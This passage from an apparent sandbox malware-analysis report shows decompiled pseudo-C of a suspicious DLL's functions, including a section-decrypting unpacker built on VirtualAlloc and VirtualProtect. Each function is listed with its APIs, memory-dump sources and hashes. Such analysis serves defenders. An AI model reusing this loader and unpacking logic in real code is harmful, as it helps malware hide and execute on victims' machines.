						} while (E00D48B7B(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                                0x00d42f70
                                0x00d42f7b
                                0x00d42f7e
                                0x00d42f81
                                0x00d42f84
                                0x00d42f8b
                                0x00d42f8d
                                0x00d42f99
                                0x00d42f9b
                                0x00d42f9b
                                0x00d42fa4
                                0x00d42faa
                                0x00d42faf
                                0x00d42fc9
                                0x00d42fd5
                                0x00d42fd7
                                0x00d42fdc
                                0x00d42fe6
                                0x00d42fe6
                                0x00d42fde
                                0x00d42fde
                                0x00d42fde
                                0x00d42fde
                                0x00d42fed
                                0x00d42ffa
                                0x00d43001
                                0x00d43006
                                0x00d43006
                                0x00d4300e
                                0x00d43011
                                0x00d43037
                                0x00d43043
                                0x00d43048
                                0x00d4304d
                                0x00d4304f
                                0x00d4307b
                                0x00d4307d
                                0x00d43051
                                0x00d43055
                                0x00d4305a
                                0x00d4305f
                                0x00d43066
                                0x00d4306c
                                0x00d43071
                                0x00d43077
                                0x00d4307e
                                0x00d43080
                                0x00d43082
                                0x00d43091
                                0x00d43097
                                0x00d4309c
                                0x00d4309e
                                0x00d430ce
                                0x00d430d0
                                0x00d430a0
                                0x00d430a0
                                0x00d430a6
                                0x00d430b3
                                0x00d430b9
                                0x00d430b9
                                0x00d430c1
                                0x00d430ca
                                0x00d430d1
                                0x00d430d3
                                0x00d430d5
                                0x00d430dc
                                0x00d430e9
                                0x00d430ee
                                0x00d430f3
                                0x00d430f5
                                0x00d430f7
                                0x00000000
                                0x00000000
                                0x00d430f9
                                0x00d430fe
                                0x00d43100
                                0x00d43107
                                0x00d4310b
                                0x00d4310e
                                0x00d43123
                                0x00d43127
                                0x00d4312c
                                0x00000000
                                0x00d4312c
                                0x00d43110
                                0x00d43112
                                0x00000000
                                0x00000000
                                0x00d4311d
                                0x00d4311f
                                0x00d43121
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d43121
                                0x00d43104
                                0x00d43104
                                0x00d430d5
                                0x00d43013
                                0x00d43013
                                0x00d43018
                                0x00d4312e
                                0x00d43132
                                0x00d4313a
                                0x00d4313a
                                0x00000000
                                0x00d43132
                                0x00d4301e
                                0x00d43021
                                0x00d4302b
                                0x00d43032
                                0x00000000
                                0x00d43142
                                0x00d43142
                                0x00d43146
                                0x00d4314a
                                0x00d4314a

                                APIs
                                  • Part of subcall function 00D459A4: GetModuleHandleA.KERNEL32(4C44544E,00000000,00D42F89,00000000,00000000), ref: 00D459B3
                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00D43006
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • memset.NTDLL ref: 00D43055
                                • RtlInitializeCriticalSection.NTDLL(03289570), ref: 00D43066
                                  • Part of subcall function 00D446B2: memset.NTDLL ref: 00D446C7
                                  • Part of subcall function 00D446B2: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00D44709
                                  • Part of subcall function 00D446B2: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00D44714
                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00D43091
                                • wsprintfA.USER32 ref: 00D430C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                • String ID:
                                • API String ID: 4246211962-0
                                • Opcode ID: 4de65a40a47153b36c75b902c478988fec2fb924cb99ba1f8668f2bd255b80ab
                                • Instruction ID: 3f006011dba1d925f05ea0f6bd970b140311e312b77fc21edc33bcfe50b18240
                                • Opcode Fuzzy Hash: 4de65a40a47153b36c75b902c478988fec2fb924cb99ba1f8668f2bd255b80ab
                                • Instruction Fuzzy Hash: D851E079A01314ABDB21AFB9DC89F6EB7B9EB05B10F184425F501E7251E7B0CA44CB74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D42D74, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E00D42D74(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00D41525(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00D48B22(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E00D41525((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xd4d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                0x00d42d7b
                                0x00d42d82
                                0x00d42d87
                                0x00d42d8a
                                0x00d42d91
                                0x00d42d94
                                0x00d42d97
                                0x00d42d9c
                                0x00d42da1
                                0x00d42ef5
                                0x00d42ef7
                                0x00d42ef9
                                0x00d42efe
                                0x00d42efe
                                0x00d42da7
                                0x00d42daa
                                0x00d42dad
                                0x00d42daf
                                0x00d42daf
                                0x00d42db3
                                0x00000000
                                0x00000000
                                0x00d42db7
                                0x00d42de3
                                0x00d42de8
                                0x00d42dea
                                0x00d42dea
                                0x00d42ded
                                0x00d42df0
                                0x00d42df0
                                0x00d42df2
                                0x00000000
                                0x00d42dbd
                                0x00d42dbf
                                0x00d42dde
                                0x00d42dde
                                0x00d42df5
                                0x00d42df5
                                0x00d42df6
                                0x00d42df6
                                0x00d42df9
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d42df9
                                0x00d42dc3
                                0x00d42e0a
                                0x00d42e0e
                                0x00d42ee8
                                0x00d42eea
                                0x00d42eea
                                0x00d42eeb
                                0x00d42eee
                                0x00000000
                                0x00d42eee
                                0x00d42e17
                                0x00d42e28
                                0x00d42e2c
                                0x00d42ee4
                                0x00000000
                                0x00d42ee4
                                0x00d42e32
                                0x00d42e35
                                0x00d42e39
                                0x00d42e3d
                                0x00d42e42
                                0x00d42eda
                                0x00d42eda
                                0x00000000
                                0x00d42ee0
                                0x00d42e4d
                                0x00d42e56
                                0x00d42e6a
                                0x00d42e71
                                0x00d42e86
                                0x00d42e8c
                                0x00d42e94
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d42e96
                                0x00d42e96
                                0x00d42e96
                                0x00d42e9d
                                0x00d42ea5
                                0x00000000
                                0x00000000
                                0x00d42ea7
                                0x00d42eb0
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00d42eb2
                                0x00d42eb4
                                0x00d42eb7
                                0x00d42eb7
                                0x00d42eba
                                0x00d42ebe
                                0x00d42ec1
                                0x00d42ec7
                                0x00d42eca
                                0x00d42ed1
                                0x00000000
                                0x00d42e4d
                                0x00d42dc8
                                0x00d42dd0
                                0x00d42dd6
                                0x00d42dd8
                                0x00d42dd8
                                0x00d42ddb
                                0x00d42ddd
                                0x00000000
                                0x00d42ddd
                                0x00d42db7
                                0x00d42dfd
                                0x00d42e02
                                0x00d42e04
                                0x00d42e04
                                0x00d42e07
                                0x00d42e07
                                0x00000000

                                APIs
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • lstrcpy.KERNEL32(69B25F45,00000020), ref: 00D42E71
                                • lstrcat.KERNEL32(69B25F45,00000020), ref: 00D42E86
                                • lstrcmp.KERNEL32(00000000,69B25F45), ref: 00D42E9D
                                • lstrlen.KERNEL32(69B25F45), ref: 00D42EC1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 65c3c1a015d04e0ebcc3e1fd25c69db79b4b635042d23bca9955e57d00a62c2d
                                • Instruction ID: 0f9fc417722d98c4d44b3bb12e4528df0543dc5ffd7178fd66ce554334c110f7
                                • Opcode Fuzzy Hash: 65c3c1a015d04e0ebcc3e1fd25c69db79b4b635042d23bca9955e57d00a62c2d
                                • Instruction Fuzzy Hash: 91519131A00218EBDF21DF99C8847BDBBB6FF55314F59806AF8559B211C770EA41DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D45319, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D45319(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00D4155A(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xd4d2a8; // 0x253a5a8
				_t4 = _t24 + 0xd4edc0; // 0x3289368
				_t5 = _t24 + 0xd4ed68; // 0x4f0053
				_t26 = E00D45D79( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xd4d2a8; // 0x253a5a8
						_t11 = _t32 + 0xd4edb4; // 0x328935c
						_t48 = _t11;
						_t12 = _t32 + 0xd4ed68; // 0x4f0053
						_t52 = E00D4272D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xd4d2a8; // 0x253a5a8
							_t13 = _t35 + 0xd4edfe; // 0x30314549
							if(E00D45B05(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0xd4d25c - 6;
								if( *0xd4d25c <= 6) {
									_t42 =  *0xd4d2a8; // 0x253a5a8
									_t15 = _t42 + 0xd4ec0a; // 0x52384549
									E00D45B05(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xd4d2a8; // 0x253a5a8
							_t17 = _t38 + 0xd4edf8; // 0x32893a0
							_t18 = _t38 + 0xd4edd0; // 0x680043
							_t45 = E00D44538(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0xd4d238, 0, _t52);
						}
					}
					HeapFree( *0xd4d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00D44FF0(_t54);
				}
				return _t45;
			}


















                                0x00d45319
                                0x00d45329
                                0x00d4532c
                                0x00d45333
                                0x00d45335
                                0x00d45335
                                0x00d45338
                                0x00d4533d
                                0x00d45344
                                0x00d45351
                                0x00d45356
                                0x00d4535a
                                0x00d45368
                                0x00d45376
                                0x00d4537a
                                0x00d4540b
                                0x00d4540b
                                0x00d45380
                                0x00d45380
                                0x00d45385
                                0x00d45385
                                0x00d4538c
                                0x00d45398
                                0x00d4539a
                                0x00d4539c
                                0x00d4539e
                                0x00d453a5
                                0x00d453b7
                                0x00d453b9
                                0x00d453c0
                                0x00d453c2
                                0x00d453c9
                                0x00d453d4
                                0x00d453d4
                                0x00d453c0
                                0x00d453d9
                                0x00d453de
                                0x00d453e5
                                0x00d45403
                                0x00d45405
                                0x00d45405
                                0x00d4539c
                                0x00d45417
                                0x00d45417
                                0x00d45419
                                0x00d4541e
                                0x00d45420
                                0x00d45420
                                0x00d4542b

                                APIs
                                • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,03289368,00000000,?,74E5F710,00000000,74E5F730), ref: 00D45368
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,032893A0,?,00000000,30314549,00000014,004F0053,0328935C), ref: 00D45405
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00D47CCB), ref: 00D45417
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID: Ut
                                • API String ID: 3298025750-8415677
                                • Opcode ID: 6b035a61663a31932b8b356badbf5f5891964559fc02e356d90887ff8f00a410
                                • Instruction ID: a2ba23657e651b8231a25724ae60737a23e5c7f299bc205a77302710d23903d3
                                • Opcode Fuzzy Hash: 6b035a61663a31932b8b356badbf5f5891964559fc02e356d90887ff8f00a410
                                • Instruction Fuzzy Hash: 5A317E36900218FFDB11EF94EC84EAABBBDEB45700F1501A5F604DB266D7B19A44DB70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D42C58, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E00D42C58(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				void* _t13;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xd4d340; // 0x3289b20
				_push(0x800);
				_push(0);
				_push( *0xd4d238);
				if( *0xd4d24c >= 5) {
					_t13 = RtlAllocateHeap(); // executed
					if(_t13 == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xd4d24c =  *0xd4d24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00D42C0D(_t44, _t40);
						_t18 = E00D431A8(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xd4d24c < 5) {
								 *0xd4d24c =  *0xd4d24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E00D45433();
						HeapFree( *0xd4d238, 0, _t40);
						goto L10;
					}
					_t24 = E00D49BF1(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E00D45450(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}












                                0x00d42c58
                                0x00d42c58
                                0x00d42c5b
                                0x00d42c5c
                                0x00d42c66
                                0x00d42c6d
                                0x00d42c72
                                0x00d42c74
                                0x00d42c7a
                                0x00d42c9a
                                0x00d42ca2
                                0x00d42cba
                                0x00d42cbc
                                0x00d42cbd
                                0x00d42cbf
                                0x00d42cfd
                                0x00d42cfd
                                0x00d42d03
                                0x00d42d09
                                0x00d42d09
                                0x00d42cc1
                                0x00d42cc7
                                0x00d42cca
                                0x00d42cd9
                                0x00d42cdb
                                0x00d42ce2
                                0x00d42d16
                                0x00d42d1b
                                0x00d42d1d
                                0x00d42d1f
                                0x00d42d1f
                                0x00000000
                                0x00d42d1d
                                0x00d42ce4
                                0x00d42ce9
                                0x00d42cf7
                                0x00000000
                                0x00d42cf7
                                0x00d42cb1
                                0x00d42cb6
                                0x00d42cb6
                                0x00000000
                                0x00d42cb6
                                0x00d42c84
                                0x00000000
                                0x00000000
                                0x00d42c93
                                0x00000000

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00D42C7C
                                  • Part of subcall function 00D45450: GetTickCount.KERNEL32 ref: 00D45464
                                  • Part of subcall function 00D45450: wsprintfA.USER32 ref: 00D454B4
                                  • Part of subcall function 00D45450: wsprintfA.USER32 ref: 00D454D1
                                  • Part of subcall function 00D45450: wsprintfA.USER32 ref: 00D454FD
                                  • Part of subcall function 00D45450: HeapFree.KERNEL32(00000000,?), ref: 00D4550F
                                  • Part of subcall function 00D45450: wsprintfA.USER32 ref: 00D45530
                                  • Part of subcall function 00D45450: HeapFree.KERNEL32(00000000,?), ref: 00D45540
                                  • Part of subcall function 00D45450: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00D4556E
                                  • Part of subcall function 00D45450: GetTickCount.KERNEL32 ref: 00D4557F
                                • RtlAllocateHeap.NTDLL(00000000,00000800,74E5F710), ref: 00D42C9A
                                • HeapFree.KERNEL32(00000000,00000002,00D47D16,?,00D47D16,00000002,?,?,00D4312C,?), ref: 00D42CF7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Heap$wsprintf$AllocateFree$CountTick
                                • String ID: Ut
                                • API String ID: 1676223858-8415677
                                • Opcode ID: 2bba14978c796a027bde17aa6b91da9151f0e01d3fd8de979f836968408c9259
                                • Instruction ID: 634103461d70fb557551307e17bf04fc9f0ef074e22c9becd1fa29db487cbc90
                                • Opcode Fuzzy Hash: 2bba14978c796a027bde17aa6b91da9151f0e01d3fd8de979f836968408c9259
                                • Instruction Fuzzy Hash: 23218E79201204EBCB119F59ECC4EAE3BADFB4A305F104026F901EB261DB70D940DBB1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 10001D31, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E10001D31(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x10004140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}












                                0x10001d3b
                                0x10001d48
                                0x10001d4e
                                0x10001d5a
                                0x10001d6a
                                0x10001d6c
                                0x10001d74
                                0x10001e09
                                0x10001e10
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10001d7a
                                0x10001d7a
                                0x10001d7a
                                0x10001d7e
                                0x00000000
                                0x00000000
                                0x10001d8a
                                0x10001d8e
                                0x10001db2
                                0x10001db6
                                0x10001dca
                                0x10001dca
                                0x10001dd0
                                0x10001ddf
                                0x10001de3
                                0x10001deb
                                0x10001deb
                                0x10001df3
                                0x10001df6
                                0x10001e03
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10001e03
                                0x10001dbe
                                0x10001dc2
                                0x10001dc8
                                0x00000000
                                0x00000000
                                0x00000000
                                0x10001dc8
                                0x10001d96
                                0x10001d9a
                                0x10001da4
                                0x10001d9c
                                0x10001d9c
                                0x10001d9c
                                0x00000000
                                0x10001d9a
                                0x00000000

                                APIs
                                • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 10001D6A
                                • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001DDF
                                • GetLastError.KERNEL32 ref: 10001DE5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProtectVirtual$ErrorLast
                                • String ID: @Mt MtTt
                                • API String ID: 1469625949-608512568
                                • Opcode ID: a625307ab09a2c47fcfcfd1582debcee65c2d17baa81293c942d2690ff0c9830
                                • Instruction ID: e700519fbe02ce22486df0362471e60f157106dcaaf3df0265f5a6019b736344
                                • Opcode Fuzzy Hash: a625307ab09a2c47fcfcfd1582debcee65c2d17baa81293c942d2690ff0c9830
                                • Instruction Fuzzy Hash: 21216B7180020AEFDB14CF95C885AEAF7F8FF48385F01445AE606D7019E3B4AA68CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D48A19, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                Download Yara Rule
                                APIs
                                • SysAllocString.OLEAUT32(80000002), ref: 00D48A76
                                • SysAllocString.OLEAUT32(00D44BD8), ref: 00D48ABA
                                • SysFreeString.OLEAUT32(00000000), ref: 00D48ACE
                                • SysFreeString.OLEAUT32(00000000), ref: 00D48ADC
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: String$AllocFree
                                • String ID:
                                • API String ID: 344208780-0
                                • Opcode ID: cbd50589c01f36fde8ec1bd7e135262b188103b5ac96bd730e7918b2334674e9
                                • Instruction ID: 6af93e47743f40de83b76014d689519346f298616fb57d009db3e960ee3ae38f
                                • Opcode Fuzzy Hash: cbd50589c01f36fde8ec1bd7e135262b188103b5ac96bd730e7918b2334674e9
                                • Instruction Fuzzy Hash: 5031FA76900249EFCB05DF98D8C58AE7BB9FF48340B24882AF506DB250EB719981DF75
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 10001B6F, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			E10001B6F(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x10004130;
				_t46 = E10002016(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x10004140;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x100051a7; // 0x100051a7
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E1000185E(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x10004140 = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}






















                                0x10001b76
                                0x10001b86
                                0x10001b8b
                                0x10001b90
                                0x10001ba5
                                0x10001bac
                                0x10001bb1
                                0x10001bc2
                                0x10001bc5
                                0x10001bcb
                                0x10001bd0
                                0x10001c83
                                0x10001bd6
                                0x10001bd6
                                0x10001bdc
                                0x10001c4b
                                0x10001bde
                                0x10001bde
                                0x10001be1
                                0x10001be3
                                0x10001beb
                                0x10001bee
                                0x10001bf1
                                0x10001bf9
                                0x10001c04
                                0x10001c05
                                0x10001c06
